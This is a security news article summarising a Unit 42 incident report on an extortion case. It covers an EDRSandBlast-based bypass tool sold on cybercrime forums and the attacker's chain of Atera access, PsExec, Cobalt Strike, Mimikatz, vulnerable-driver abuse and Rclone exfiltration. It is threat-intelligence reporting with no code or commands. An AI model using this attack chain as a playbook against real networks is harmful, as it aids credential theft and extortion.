EDR Bypass Tool Exploited in Extortion Scheme

An investigation into an extortion attempt involving an AV/EDR bypass tool based on EDRSandBlast has revealed insights into the threat actor's tactics, presence on cybercrime forums, and the increasing popularity of tools designed to evade essential security measures. The incident response report by Unit 42 highlights how the bypass tool, "disabler.exe," based on modified EDRSandBlast code, has gained traction on forums like XSS and Exploit, with positive feedback from buyers. Unit 42’s analysis underscores the rising threat posed by AV/EDR bypass tools, which continue to evolve and weaken traditional endpoint defenses. Interestingly, there are overlaps between the tactics used in this attack and those linked to the Conti ransomware group, though no direct evidence from the Conti playbook was found on the rogue system.

The threat actor's attack path, as reconstructed by Unit 42, began with initial access through Atera, a remote monitoring and management tool. Access was stated to have been purchased from an "independent hacktivist," allowing the attacker to penetrate the victim's network. Once inside, the threat actor used PsExec to facilitate lateral movement and deployed Cobalt Strike beacons to establish command and control (C2). Persistence was afforded through the use of scheduled tasks. Following this phase, the attackers performed a series of internal discovery commands on the domain controller. They accessed credentials through Mimikatz and an LSASS memory dump, leveraging "disabler.exe" to evade AV/EDR defenses. Using the BYOVD (Bring Your Own Vulnerable Driver) approach with the wnbios.sys or WN_64.sys drivers aided in disabling EDR. Additionally, Rclone facilitated exfiltration activities for data transfer.

As the attack progressed, the threat actor moved to extort the victim, claiming to have exfiltrated a substantial volume of data. An extortion email was sent, notifying the victim of the breach and the data theft. Concurrently, Unit 42 uncovered that rogue virtual machines were connected to the victim’s Cortex XDR tenant, enabling Unit 42 to observe the threat actor’s tools and processes. Among the tools found on these rogue systems were various malicious toolkits, along with recordings demonstrating successful AV/EDR bypasses, including Mimikatz executions post-bypass. Further review had identified the recordings shared around cybercrime forums by a user under the alias "KernelMode."

Unit 42’s in-depth investigation into this incident provided insights into the threat actor's methods, revealing overlaps with the tactics, techniques, and procedures (TTPs) commonly employed by Conti affiliates. As Unit 42 reported, "the rogue system contained ContiTraining.rar, but we found no indication that the attackers downloaded material from the Conti playbook on the rogue system. However, we observed some overlaps between the Conti playbook and tactics, techniques, and procedures (TTPs) captured during this incident attack chain." Specific callouts, as evident from this intrusion, included using tools Atera, Cobalt Strike, PsExec, and Rclone to achieve various objectives. This investigation demonstrates the interconnection between cybercrime actors, trends, and activity in cybercrime forums.